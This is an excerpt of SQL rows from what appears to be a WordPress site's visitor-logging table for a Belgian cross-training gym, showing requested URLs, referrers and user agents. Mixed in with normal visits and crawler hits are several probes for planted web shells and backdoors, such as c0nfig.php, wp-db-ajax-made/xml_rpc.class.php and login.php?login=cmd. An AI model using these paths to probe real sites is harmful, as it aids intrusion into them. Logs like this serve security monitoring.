(75424, 1497647735.563840, 3349724530, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75425, 1497649845.897407, 1570674765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75426, 1497652171.489813, 1338306317, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75427, 1497658886.036626, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75428, 1497659319.463447, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75429, 1497659319.470454, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75430, 1497659320.334207, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75431, 1497659320.870284, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75432, 1497659321.760849, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75433, 1497659322.665608, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75434, 1497659323.407199, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75435, 1497659324.418516, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75436, 1497659325.925030, 623920375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'),
(75437, 1497659627.681407, 1728497228, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/models.php', 'http://crosstrainingcenter.be/models.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75438, 1497666235.939401, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75439, 1497671423.411867, 1338306317, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75440, 1497678911.792104, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75441, 1497678912.346947, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75442, 1497678912.822961, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75443, 1497678913.239705, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75444, 1497678913.709738, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75445, 1497678914.243535, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75446, 1497678914.726427, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75447, 1497678915.139190, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75448, 1497678915.547314, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75449, 1497678916.053785, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75450, 1497678916.557850, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75451, 1497680758.386927, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75452, 1497681775.371680, 1092908185, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.37 (KHTML, like Gecko) Version/5.2.7 Safari/530.73'),
(75453, 1497681781.463052, 1050916933, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.80.37 (KHTML, like Gecko) Version/5.2.7 Safari/530.73'),
(75454, 1497686999.150581, 1382193114, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/c0nfig.php', 'http://crosstrainingcenter.be/c0nfig.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75455, 1497693927.763046, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(75456, 1497694555.066730, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75457, 1497697085.841982, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75458, 1497700355.446203, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75459, 1497703045.922818, 533672141, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyeleven/content-wrapper.php', 'http://crosstrainingcenter.be/wp-content/themes/twentyeleven/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75460, 1497705237.129580, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(75461, 1497705285.425373, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75462, 1497706392.418067, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75463, 1497706392.877272, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75464, 1497711799.306514, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75465, 1497711799.769985, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75466, 1497711800.243300, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75467, 1497711800.739140, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75468, 1497711801.203861, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75469, 1497711801.602347, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75470, 1497711801.994864, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75471, 1497711802.705873, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75472, 1497711803.384988, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75473, 1497711803.926959, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75474, 1497711804.389067, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75475, 1497711805.223452, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75476, 1497711805.779001, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75477, 1497711806.320990, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75478, 1497713138.086703, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75479, 1497713138.605957, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75480, 1497713139.061613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75481, 1497713139.498086, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75482, 1497713139.989788, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75483, 1497713140.424788, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75484, 1497713140.999592, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75485, 1497713141.488231, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75486, 1497713141.970395, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75487, 1497713142.509117, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75488, 1497713142.925604, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75489, 1497713278.544518, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75490, 1497713917.920626, 3657088185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75491, 1497714214.958086, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75492, 1497715154.904932, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75493, 1497716112.464543, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75494, 1497716401.160463, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75495, 1497716833.260176, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75496, 1497716951.557104, 1370067079, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made-1/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75497, 1497718223.388536, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75498, 1497724030.382028, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75499, 1497724030.861078, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75500, 1497724031.298421, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75501, 1497724031.742326, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75502, 1497724032.235645, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75503, 1497724032.843320, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75504, 1497724033.291388, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75505, 1497724033.739238, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75506, 1497724034.154592, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75507, 1497724034.564894, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75508, 1497724034.967952, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75509, 1497724035.445152, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75510, 1497724035.822623, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75511, 1497724036.260571, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75512, 1497724946.036739, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75513, 1497726048.276863, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75514, 1497727049.479110, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75515, 1497727913.517198, 609542472, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/contact-form-7/login.php?login=cmd', 'http://crosstrainingcenter.be/wp-content/plugins/contact-form-7/login.php?login=cmd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75516, 1497730401.148540, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75517, 1497730470.475316, 1355389021, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(75518, 1497730500.408313, 1355389021, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(75519, 1497730869.890476, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75520, 1497734838.889832, 3226577416, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75521, 1497739273.993611, 3024883468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(75522, 1497739274.025435, 3024883490, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(75523, 1497739353.794947, 3024883473, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75524, 1497739800.745072, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75525, 1497739801.181027, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75526, 1497739801.622615, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75527, 1497739802.085472, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75528, 1497739802.635569, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75529, 1497739803.060192, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75530, 1497739803.621157, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75531, 1497739804.106634, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75532, 1497739804.647227, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75533, 1497739805.047842, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75534, 1497739805.440184, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75535, 1497739805.897043, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75536, 1497739806.279144, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75537, 1497739806.667474, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75538, 1497741243.373561, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75539, 1497743542.144565, 1467349730, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/gaukingo/db.php', 'http://crosstrainingcenter.be/wp-content/themes/gaukingo/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(75540, 1497743676.980790, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75541, 1497756040.778933, 3475901899, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
